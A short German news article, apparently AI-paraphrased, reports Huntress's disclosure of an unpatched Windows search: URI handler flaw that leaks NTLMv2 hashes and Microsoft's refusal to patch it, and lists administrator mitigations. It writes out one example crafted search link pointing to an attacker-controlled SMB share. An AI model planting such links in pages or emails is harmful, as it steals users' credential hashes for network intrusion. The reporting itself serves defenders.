Auf den Punkt: Über manipulierte Search-Links können Angreifer NTLMv2-Hashes auslesen – Microsoft stuft das Risiko als zu gering für einen Patch ein.
Das Sicherheitsunternehmen Huntress hat eine ungepatchte Schwachstelle im Windows-Search-URI-Handler dokumentiert, über die Angreifer NTLMv2-Hashes abfangen können. Microsoft hat eine Behebung der Lücke explizit abgelehnt.
Das Sicherheitsunternehmen Huntress hat am 15. April 2026 eine ungepatchte Schwachstelle in Microsoft Windows der verantwortungsvollen Offenlegung unterworfen. Das Problem liegt im search: URI-Handler des Betriebssystems. Angreifer präparieren speziell gestaltete Links mit dem Parameter crumb=location (beispielsweise search:query=test&crumb=location:\10.0.1.100share) und betten diese in Webseiten oder E-Mails ein. Klickt ein Benutzer auf solch einen Link und bestätigt die Ausführung, baut Windows automatisch eine Verbindung zu einem von Angreifern kontrollierten SMB-Server auf – und übermittelt dabei den NTLMv2-Hash des angemeldeten Benutzers.
Mit dem abgefangenen Hash können Cyberkriminelle sich anschließend gegenüber anderen Diensten im internen Netzwerk als das betroffene Benutzerkonto authentifizieren und weitere Systeme kompromittieren. Die Huntress-Forscher identifizierten zudem technische Parallelen zu bereits behobenen Lücken: CVE-2023-35636 (Februar 2024) und CVE-2026-33829 (April 2026, Windows Snipping Tool) nutzten denselben NTLM-Leckagemechanismus und erzeugte das gleiche Netzwerk-NTLMv2-Leck unter identischen Bedingungen.
Trotz dieser Parallelen lehnte Microsoft eine Sicherheitskorrektur ab. Der Hersteller stuft die Lücke als Moderate (Mittleres Risiko) ein und verweist auf seine Richtlinie: Offizielle Sicherheits-Patches werden nur für Fehler bereitgestellt, die als Important oder Critical bewertet werden. Damit bleibt die Schwachstelle auf allen Systemen offen, die den Search-Handler standardmäßig verarbeiten.
Für Administratoren bleiben manuelle Schutzmaßnahmen: Das Blockieren von ausgehendem SMB-Verkehr (TCP 445, TCP 139) für Rechner ohne externe SMB-Freigaben; die erzwungene SMB-Signierung zur Verhinderung von Relay-Angriffen; sowie die Deaktivierung von NTLM-Authentifizierung in Active-Directory-Umgebungen, soweit kompatibel.
Quelle: www.it-daily.net · Erschienen 5. Juni 2026
Lumi AI News — KI-assistierte Kuratierung gemaess Art. 50 EU AI Act. Paraphrase und Klassifikation durch Lumi News Pipeline v1.6.5.